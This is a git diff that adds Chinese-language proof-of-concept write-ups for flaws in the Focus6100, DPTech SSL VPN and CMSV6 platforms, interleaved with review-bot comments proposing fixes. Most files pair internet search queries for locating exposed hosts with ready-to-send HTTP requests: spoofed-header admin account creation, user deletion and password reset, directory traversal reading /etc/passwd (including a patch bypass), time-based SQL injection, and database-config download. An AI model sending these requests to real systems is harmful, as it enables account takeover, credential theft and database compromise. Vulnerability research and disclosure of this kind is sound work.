@@ -0,0 +1,47 @@ +# 迪威讯Focus6100音视频通讯平台存在任意用户删除 + +# 一、漏洞简介 +迪威讯Focus6100音视频通讯平台存在任意用户删除 + +# 二、影响版本 ++ 迪威讯Focus6100音视频通讯平台 + +# 三、资产测绘 ++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"` ++ 特征 + +![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/iCp6n463PYDv5NDp/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-020946.png) + +# 四 、漏洞复现 +先获取ID + +```java +GET /portal/rest/users HTTP/1.1 +Host: +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Connection: close +``` + +![1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8.png](./img/iCp6n463PYDv5NDp/1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8-624829.png) + +利用获取ID删除用户 + +```java +DELETE /portal/rest/users/ff8080819200f6750192274beccc0019 HTTP/1.1 +Host: +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Connection: close +``` + +![1727237124222-466859ab-cbe1-4ef1-a344-0acb772d2535.png](./img/iCp6n463PYDv5NDp/1727237124222-466859ab-cbe1-4ef1-a344-0acb772d2535-711660.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: \ No newline at end of file diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md b/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md new file mode 100644 index 0000000..cf92202 --- /dev/null +++ b/迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞.md 
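Review bot: the write-up never explains why the requests are accepted; the only identity material in the GET and DELETE blocks is `Current-User: admin|Administrator`, with no session cookie, which points to the server trusting a client-supplied identity header. State that as the root cause and the fix (derive user and role from the server-side session, never from a request header). `ff8080819200f6750192274beccc0019` in `DELETE /portal/rest/users/...` is an id from one instance; label it as a placeholder taken from the previous response. The heading `# 四 、漏洞复现` has a stray space before `、`, and the 简介 only repeats the title.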
@@ -0,0 +1,56 @@ +# 迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞 + +# 一、漏洞简介 +迪威讯Focus6100音视频通讯平台存在任意用户密码修改漏洞 + +# 二、影响版本 ++ 迪威讯Focus6100音视频通讯平台 + +# 三、资产测绘 ++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"` ++ 特征 + +![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/MTvBdG6ERuHZMlFh/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-959691.png) + +# 四 、漏洞复现 +先获取ID + +```java +GET /portal/rest/users HTTP/1.1 +Host: +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Connection: close +``` + +![1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8.png](./img/MTvBdG6ERuHZMlFh/1727236976160-7d286d29-24f9-40e3-86d0-98105090b8a8-255472.png) + +利用获取ID重置密码 + +```java +PUT /portal/rest/users/ff8080819200f6750192272f08bb0000/changepassword HTTP/1.1 +Host: +Content-Length: 32 +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Accept-Encoding: gzip, deflate +Connection: close + +e10adc3949ba59abbe56e057f20f883e +``` + +![1727237017987-fc40aacc-8356-4d97-ac60-c5e007fd5fe0.png](./img/MTvBdG6ERuHZMlFh/1727237017987-fc40aacc-8356-4d97-ac60-c5e007fd5fe0-606119.png) + +重置后登录: + +![1727237031040-5d6fa479-b51f-42b9-ad53-f0924196b2e2.png](./img/MTvBdG6ERuHZMlFh/1727237031040-5d6fa479-b51f-42b9-ad53-f0924196b2e2-561445.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: \ No newline at end of file diff --git a/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md b/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md new file mode 100644 index 0000000..be1f042 --- /dev/null +++ b/迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞.md 
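Review bot: the PUT body `e10adc3949ba59abbe56e057f20f883e` is a bare 32-character string sent with `Content-Type: application/json;charset=UTF-8`; it is not JSON, and the write-up should say what it is (the sibling 添加 file pairs this same value with `test1/123456`, i.e. an unsalted MD5 of the new password). Note both weaknesses: `changepassword` is reachable with only the `Current-User: admin|Administrator` header, and the server accepts a client-computed MD5 as the password. The id `ff8080819200f6750192272f08bb0000` is instance-specific and should be marked as taken from the `/portal/rest/users` response; also fix the `# 四 、漏洞复现` spacing.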
@@ -0,0 +1,40 @@ +# 迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞 + +# 一、漏洞简介 +迪威讯Focus6100音视频通讯平台存在任意用户添加漏洞 + +# 二、影响版本 ++ 迪威讯Focus6100音视频通讯平台 + +# 三、资产测绘 ++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"` ++ 特征 + +![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/0oTztu8wtNxM6fDr/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-858583.png) + +# 四 、漏洞复现 +```java +POST /portal/rest/users HTTP/1.1 +Host: +Content-Length: 85 +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Accept-Encoding: gzip, deflate +Connection: close + +{"role":"Administrator","name":"test1","password":"e10adc3949ba59abbe56e057f20f883e"} +``` + +![1727236694945-4d6de57a-5d7b-466c-9196-174780417908.png](./img/0oTztu8wtNxM6fDr/1727236694945-4d6de57a-5d7b-466c-9196-174780417908-597623.png) + +test1/123456 + +![1727236724047-c0a67d6a-2398-4693-99a3-c094b0c6125c.png](./img/0oTztu8wtNxM6fDr/1727236724047-c0a67d6a-2398-4693-99a3-c094b0c6125c-790238.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: \ No newline at end of file diff --git a/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md b/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..d34a2ea --- /dev/null +++ b/迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞.md 
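Review bot: the bare line `test1/123456` between the screenshots should be a sentence (`使用新建账号 test1/123456 登录`), and the write-up should state that the JSON body creates an account with `"role":"Administrator"` using only the `Current-User: admin|Administrator` header, the same unauthenticated-trust problem as the other 迪威讯 files. One shared root-cause and mitigation paragraph (server-side authorisation on `/portal/rest/users`, removal of the test account after verification) would be better than four copies of a 简介 that only repeats the title.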
@@ -0,0 +1,31 @@ +# 迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞 + +# 一、漏洞简介 +迪威讯Focus6100音视频通讯平台存在敏感信息泄露漏洞 + +# 二、影响版本 ++ 迪威讯Focus6100音视频通讯平台 + +# 三、资产测绘 ++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"` ++ 特征 + +![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/KnyYKXzCYtkOpk7c/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-744711.png) + +# 四 、漏洞复现 +```java +GET /portal/rest/users HTTP/1.1 +Host: +Accept: application/json, text/plain, */* +Current-User: admin|Administrator +Accept-Language: zh-CN +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Connection: close +``` + +![1727236656514-5bb4c381-fbea-4fc1-b574-5c4e273f04e8.png](./img/KnyYKXzCYtkOpk7c/1727236656514-5bb4c381-fbea-4fc1-b574-5c4e273f04e8-402836.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: \ No newline at end of file diff --git a/迪威讯Focus6100音视频通讯平台存在默认口令.md b/迪威讯Focus6100音视频通讯平台存在默认口令.md new file mode 100644 index 0000000..837d7a5 --- /dev/null +++ b/迪威讯Focus6100音视频通讯平台存在默认口令.md @@ -0,0 +1,25 @@ +# 迪威讯Focus6100音视频通讯平台存在默认口令 + +# 一、漏洞简介 +迪威讯Focus6100音视频通讯平台存在默认口令 + +# 二、影响版本 ++ 迪威讯Focus6100音视频通讯平台 + +# 三、资产测绘 ++ fofa`web.icon=="bbc933535a6bfe478afb1fd0b3c470bf"` ++ 特征 + +![1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3.png](./img/d_MM-ba6htDUAIze/1727236496776-a86037c1-f827-4701-8df6-d3ff921c09b3-553392.png) + +# 四 、漏洞复现 +```java +admin/admin +``` + +![1727236535116-6b187be5-de46-4866-9551-77c70e969f05.png](./img/d_MM-ba6htDUAIze/1727236535116-6b187be5-de46-4866-9551-77c70e969f05-122706.png) + + + +> 更新: 2024-10-22 09:36:09 +> 原文: \ No newline at end of file diff --git a/迪普DPTech-VPN-任意文件读取.md b/迪普DPTech-VPN-任意文件读取.md new file mode 100644 index 0000000..6700619 --- /dev/null +++ b/迪普DPTech-VPN-任意文件读取.md 
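Review bot: in the 敏感信息泄露 hunk, the request `GET /portal/rest/users` duplicates step one of the 删除 and 密码修改 write-ups, and the 简介 is only the title; say what fields the response exposes (the screenshot is the only evidence) and cross-reference the other files instead of repeating the request. The ```java fence tag on an HTTP request should be `plain`.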
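Review bot: in the 默认口令 hunk, `admin/admin` sits in a ```java fence; use `plain`. The 简介 only restates the title; add the mitigation (force a password change on first login, and treat `admin/admin` as a finding in configuration baselines) and the affected version.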
@@ -0,0 +1,23 @@ +## 迪普DPTech VPN 任意文件读取 CNVD-2023-69478 +杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞,攻击者可利用该漏洞获敏感信息。 + +## 漏洞影响产品 +杭州迪普科技股份有限公司DPtech SSL VPN + +## fofa +``` +title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa" +``` + +## poc +``` +GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: xxxxxxxxx +Cookie: SSLVPN_lang=1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +se +``` +## 漏洞复现 +![](./assets/780475ed2a4b528fe68184a4f665a7d1fe08f3.png) + +![](./assets/7171140331ad9063b8e9a92e8161c325c0b418.png) diff --git a/迪普DPTech-VPN任意文件读取(补丁绕过).md b/迪普DPTech-VPN任意文件读取(补丁绕过).md new file mode 100644 index 0000000..2b86910 --- /dev/null +++ b/迪普DPTech-VPN任意文件读取(补丁绕过).md @@ -0,0 +1,19 @@ +## 迪普DPTech-VPN任意文件读取(补丁绕过) +杭州迪普科技股份有限公司DPtech SSL VPN存在任意文件读取漏洞,攻击者可利用该漏洞获敏感信息。 + +## fofa +```javascript +title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa" +``` + +## poc +```javascript +GET /.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2F.%00.%2Fetc%2Fpasswd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Encoding: gzip, deflate +Connection: keep-alive +``` +![image-20241012132203032](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121322100.png) diff --git a/迪普VPN文件读取漏洞.md b/迪普VPN文件读取漏洞.md new file mode 100644 index 0000000..0d7cd00 --- /dev/null +++ b/迪普VPN文件读取漏洞.md 
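Review bot: in the CNVD-2023-69478 hunk, the `se` line at the end of the `## poc` request is a stray fragment, not a header, and will break the request; delete it. The fofa expression `title=="SSL VPN Service" && header="Dptech" || cert="DPtechCa"` mixes `&&` and `||` without parentheses, so its meaning depends on operator precedence; bracket the intended grouping. `Host: xxxxxxxxx` should follow the empty `Host:` convention, and the CNVD id from the title belongs in the body together with the affected version and the vendor fix.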
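Review bot: in the 补丁绕过 hunk, the description is copied verbatim from the CNVD-2023-69478 file and does not say which patch is bypassed or which versions remain affected; a reader cannot tell from `/.%00.%2F.%00.%2F...` alone that this is a post-fix variant. Reference the original advisory, state the patched version the bypass was tested against, and note that a correct fix decodes and normalises the path (including `%00`) before the traversal check rather than matching `../` literally. The ```javascript fences should be `plain`.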
@@ -0,0 +1,25 @@ +# 迪普VPN 文件读取漏洞 + +# 一、漏洞简介 +杭州迪普科技股份有限公司(简称“迪普科技”) 以“让网络更简单、智能、安全”为使命,聚焦于网络安全及应用交付领域,是一家集研发、生产、销售于一体的高科技上市企业迪普VPN存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息等. + +# 二、漏洞简介 ++ 迪普VPN + +# 三、资产测绘 ++ hunter`app.name="迪普科技 SSL VPN"` ++ 特征 + +![1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768.png](./img/czNyRt8mHUwlBYkD/1700146429112-a3552bb7-8370-42ee-9552-50a806ed9768-159962.png) + +# 四、漏洞复现 +```plain +/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +``` + +![1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7.png](./img/czNyRt8mHUwlBYkD/1700146450840-3855310d-e778-459d-8373-b8c5ba05cbc7-175575.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md b/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md new file mode 100644 index 0000000..10148f9 --- /dev/null +++ b/通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 通天星CMSV6车载定位监控平台getAlarmAppealByGuid存在SQL注入漏洞 + +该漏洞是由于通天星CMSV6车载定位监控平台 /alarm_appeal/getAlarmAppealByGuid 接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。 + +## fofa + +```java +body="/808gps/" +``` + +## poc + +```java +POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Encoding: gzip, deflate + +guid=1') AND (SELECT 3904 FROM (SELECT(SLEEP(5)))PITq) AND ('qhqF'='qhqF +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408282321708.png) \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md b/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md new file mode 100644 index 0000000..520d30c 
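Review bot: in the 迪普VPN hunk, the second heading `# 二、漏洞简介` duplicates the first; it should be `# 二、影响版本` as in every other file. The 简介 runs the company blurb straight into the finding (`...高科技上市企业迪普VPN存在文件读取漏洞`) and ends with a Latin full stop; add `。` after `企业` and at the end. This is the same `/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd` traversal as the CNVD-2023-69478 write-up elsewhere in this commit; cross-reference it rather than keeping a third copy.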
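Review bot: in the 通天星 getAlarmAppealByGuid hunk, the path `/alarm_appeal/getAlarmAppealByGuid;downloadLogger.action` carries a `;downloadLogger.action` suffix that the text never explains, so a defender cannot tell whether the interface is reachable without it or which route to protect; state why it is there. The description names the cause (input concatenated into SQL via `guid`) but no fix; add parameterised queries. The fofa fence is tagged ```java; retag as `plain`, and the file is missing its trailing newline.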
--- /dev/null +++ b/通天星CMSV6车载视频监控平台MobileAction_downLoad存在任意文件下载漏洞.md @@ -0,0 +1,33 @@ +# 通天星CMSV6车载视频监控平台 MobileAction_downLoad存在任意文件下载漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台存在任意文件下载漏洞,攻击者可通过此漏洞下载敏感文件信息,获取数据库账号密码,从而为下一步攻击做准备。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/O6cMOOUOshBGj0hG/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-535114.png) + +# 四、漏洞复现 +```plain +GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: language=zh; style=1; EnableAESLogin=0; maintitle=%u5317%u6597%u4E3B%u52A8%u5B89%u5168%u4E91%u5E73%u53F0; name=value; JSESSIONID=91A2BB4151F3DCBD654371B8E33B7221 +Upgrade-Insecure-Requests: 1 +``` + +![1699407453347-449fe4b6-8e51-4242-becb-b8dbe12b9312.png](./img/O6cMOOUOshBGj0hG/1699407453347-449fe4b6-8e51-4242-becb-b8dbe12b9312-854633.png) + + + +> 更新: 2024-12-28 13:05:36 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md new file mode 100644 index 0000000..0f1394e --- /dev/null +++ b/通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞.md 
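Review bot: the `Cookie:` line is a raw capture (`maintitle=%u5317...`, `name=value`, `JSESSIONID=91A2BB4151F3DCBD654371B8E33B7221`) and `Host: xx.xx.xx.xx` differs from the empty `Host:` convention; scrub both to placeholders and say whether a session is needed at all, since the title claims unauthenticated download. The 简介 says the flaw exposes `数据库账号密码`, which the `path=/WEB-INF/classes/config/jdbc.properties` request supports; add the mitigation (confine `path` to the intended media directory, and rotate database credentials on any exposed instance).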
@@ -0,0 +1,39 @@ +# 通天星CMSV6车载视频监控平台 SelectDevAction_loadServerLoggerFile存在信息泄露漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台SelectDevAction_loadServerLoggerFile存在信息泄露漏洞。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/AY8vLTutAnleML4f/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-105320.png) + +# 四、漏洞复现 +```plain +POST /808gps/LoggerManagement/SelectDevAction_loadServerLoggerFile.action HTTP/1.1 +Host: {hostname} +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded;charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8 +Connection: close + +page=1&rp=15&query=&qtype=&pagin=%257B%2522currentPage%2522%253A1%252C%2522pageRecords%2522%253A15%257D +``` + +![1703419489990-7686e3c1-cc5b-47aa-911f-58344b3d833e.png](./img/AY8vLTutAnleML4f/1703419489990-7686e3c1-cc5b-47aa-911f-58344b3d833e-465266.png) + +nuclei脚本 + +[通天星-CMSV6-selectdevaction-loadserverloggerfile-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1735362335744-7f4aa846-6ab1-4fda-99a8-38cd92d8f800.yaml) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md new file mode 100644 index 0000000..0b5360c --- /dev/null +++ b/通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞.md 
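Review bot: the nuclei template is only linked as a yuque attachment (`https://www.yuque.com/attachments/yuque/0/2024/yaml/...`) rather than committed next to the markdown, so the repo copy becomes useless when the link expires; add the yaml file. `Host: {hostname}` uses a different placeholder convention from the empty `Host:` elsewhere; pick one. The 简介 ends with `存在信息泄露漏洞。` but never says what the server logger file exposes or which version is affected; add both and a fix (restrict `/808gps/LoggerManagement/` to authenticated administrators).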
@@ -0,0 +1,38 @@ +# 通天星CMSV6车载视频监控平台 SelectDevAction_loadWebLoggerFile存在信息泄露漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台SelectDevAction_loadWebLoggerFile存在信息泄露漏洞。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/TXQxrAkI_D_RFddr/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-856466.png) + +# 四、漏洞复现 +```plain +POST /808gps/LoggerManagement/SelectDevAction_loadWebLoggerFile.action HTTP/1.1 +Host: +Content-Length: 103 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +jsessionId: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=87F04E406314662DEF40451BC5114457 +Connection: close + +page=1&rp=15&query=&qtype=&pagin=%257B%2522currentPage%2522%253A1%252C%2522pageRecords%2522%253A15%257D +``` + +![1706862603015-66ad1edb-9862-424f-8dd7-5ceef0e610f9.png](./img/TXQxrAkI_D_RFddr/1706862603015-66ad1edb-9862-424f-8dd7-5ceef0e610f9-748844.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md b/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md new file mode 100644 index 0000000..c60990f --- /dev/null +++ b/通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞.md 
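Review bot: the request has an empty `jsessionId:` header and a captured `Cookie: JSESSIONID=87F04E406314662DEF40451BC5114457`, which contradicts the implied unauthenticated access; state whether a valid session is required and scrub the cookie. The 简介 restates the title without saying what the web logger file reveals or the affected version; add both and the same fix as the server-logger sibling (authentication on `/808gps/LoggerManagement/`).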
@@ -0,0 +1,25 @@ +# 通天星CMSV6车载视频监控平台 StandardApiAction_findCompanyList存在信息泄露漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台StandardApiAction_findCompanyList存在信息泄露漏洞 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/GQkoOthvOMVbREfc/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-215897.png) + +# 四、漏洞复现 +```plain +/StandardApiAction_findCompanyList.action +``` + +![1706970512382-ec095a83-9453-42a2-9e8c-8e93eb7525bf.png](./img/GQkoOthvOMVbREfc/1706970512382-ec095a83-9453-42a2-9e8c-8e93eb7525bf-011750.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: \ No newline at end of file diff --git a/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md b/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md new file mode 100644 index 0000000..e8af1ca --- /dev/null +++ b/通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞.md 
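Review bot: the reproduction is the bare path `/StandardApiAction_findCompanyList.action`, without the `/808gps/` context prefix the other 通天星 files use and without method or host; give the full request so readers know which context path is affected. The 简介 ends on the title with no full stop and does not say what company data is exposed or which version is affected; add both and the fix (authentication on the StandardApi actions).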
@@ -0,0 +1,40 @@ +# 通天星CMSV6车载视频监控平台 StandardApiAction_vehicleTTS存在SQL注入漏洞 + +# 一、漏洞简介 +通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台StandardApiAction_vehicleTTS存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。 + +# 二、影响版本 ++ 通天星CMSV6车载视频监控平台 + +# 三、资产测绘 ++ hunter`web.body="./open/webApi.html"` ++ 特征 + +![1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4.png](./img/cz217sMk_C1P0rEd/1699407412929-42aaba13-ce63-4d08-95e9-ce71fcab3ab4-644770.png) + +# 四、漏洞复现 +```plain +GET /StandardApiAction_vehicleTTS.action?DevIDNO=1&Text=x&jsession=2C0EB587191F68C441F128919862AC11%27%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(3)))DpjE)--%20gtMe HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=8D45F4B70B77ED88CCD43B3050A2934F +Connection: close +``` + +![1706887910425-9c6df7cf-28b3-403c-a048-e666ce8cf4af.png](./img/cz217sMk_C1P0rEd/1706887910425-9c6df7cf-28b3-403c-a048-e666ce8cf4af-848983.png) + +```plain +/StandardApiAction_vehicleTTS.action?DevIDNO=1&Text=x&jsession=2C0EB587191F68C441F128919862AC11 +``` + +![1706888743695-736d4eba-5807-4067-ab5b-db94423a9e94.png](./img/cz217sMk_C1P0rEd/1706888743695-736d4eba-5807-4067-ab5b-db94423a9e94-050317.png) + + + +> 更新: 2024-12-28 13:05:35 +> 原文: 